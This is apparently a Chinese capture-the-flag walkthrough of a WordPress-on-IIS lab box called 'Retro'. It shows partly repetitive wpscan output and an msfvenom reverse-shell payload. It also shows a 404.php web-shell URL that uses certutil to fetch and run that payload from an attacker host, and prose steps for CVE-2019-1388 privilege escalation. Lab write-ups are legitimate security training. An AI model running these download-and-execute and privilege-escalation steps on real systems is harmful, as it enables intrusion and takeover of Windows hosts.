难度:简单
0x01 信息收集 nmap
http
wordpress 1 wpscan --url http://ip/retro -e u
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 [+] URL: http://10.10.59.241/Retro/ [10.10.59.241] [+] Started: Wed Sep 30 04:29:59 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Microsoft-IIS/10.0 | - X-Powered-By: PHP/7.1.29 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.59.241/Retro/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] WordPress readme found: http://10.10.59.241/Retro/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.59.241/Retro/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21). | Found By: Rss Generator (Passive Detection) | - http://10.10.59.241/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator > | - http://10.10.59.241/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator> [+] WordPress theme in use: 90s-retro | Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/ | Latest Version: 1.4.10 (up to date) | Last Updated: 2019-04-15T00:00:00.000Z | Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt | Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1 | Style Name: 90s Retro | Style URI: https://organicthemes.com/retro-theme/ | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 9 0s!? Probably n... | Author: Organic Themes [+] The external WP-Cron seems to be enabled: http://10.10.59.241/Retro/wp-cron.php [13/1922] | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21). | Found By: Rss Generator (Passive Detection) | - http://10.10.59.241/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator > | - http://10.10.59.241/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</ generator> [+] WordPress theme in use: 90s-retro | Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/ | Latest Version: 1.4.10 (up to date) | Last Updated: 2019-04-15T00:00:00.000Z | Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt | Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1 | Style Name: 90s Retro | Style URI: https://organicthemes.com/retro-theme/ | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 9 0s!? Probably n... | Author: Organic Themes | Author URI: https://organicthemes.com | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.4.10 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4 .10' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06 [i] User(s) Identified: [+] wade | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.59.241/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Wade | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [0/1922] [+] WordPress theme in use: 90s-retro | Location: http://10.10.59.241/Retro/wp-content/themes/90s-retro/ | Latest Version: 1.4.10 (up to date) | Last Updated: 2019-04-15T00:00:00.000Z | Readme: http://10.10.59.241/Retro/wp-content/themes/90s-retro/readme.txt | Style URL: http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1 | Style Name: 90s Retro | Style URI: https://organicthemes.com/retro-theme/ | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 9 0s!? Probably n... | Author: Organic Themes | Author URI: https://organicthemes.com | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.4.10 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.59.241/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4 .10' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:06 <=======================> (10 / 10) 100.00% Time: 00:00:06 [i] User(s) Identified: [+] wade | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.59.241/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Wade | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/ sign_up [+] Finished: Wed Sep 30 04:30:21 2020 [+] Requests Done: 52 [+] Cached Requests: 6 [+] Data Sent: 10.477 KB [+] Data Received: 239.011 KB [+] Memory used: 171.227 MB [+] Elapsed time: 00:00:21
先生成shell
1 msfvenom -p windows/shell_reverse_tcp LHOST=Your ip LPORT=1234 -f exe -o shell-thm.exe
访问这个主题的404页面并下载执行shell。
1 2 3 http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php?cmd=certutil%20-urlcache%20-split%20-f%20http:%2f%2fYour-IP:8000%2fshell-thm.exe http://10.10.59.241/Retro/wp-content/themes/twentysixteen/404.php?cmd=shell-thm.exe
拿到shell。。
RDP 在博客上拿到密码后,完全!不!需要!在wordpress上反弹个shell。因为可以直接rdp连接。。。做到一半才想起来还开着RDP。。
chrome浏览历史中有多次出现CVE-2019-1388
详细的复现过程:
总的来说就是,弹出输入密码的时候,通过点击文件的ca文件来打开浏览器,在浏览器中保存当前页面为 然后路径输入C:\windowys\system32\*.*
跳转到system32目录下,并且能显示其他格式的文件(如果自己去点目录到system32的话,只有文件夹)之后再找到cmd 右键打开。
😓,,,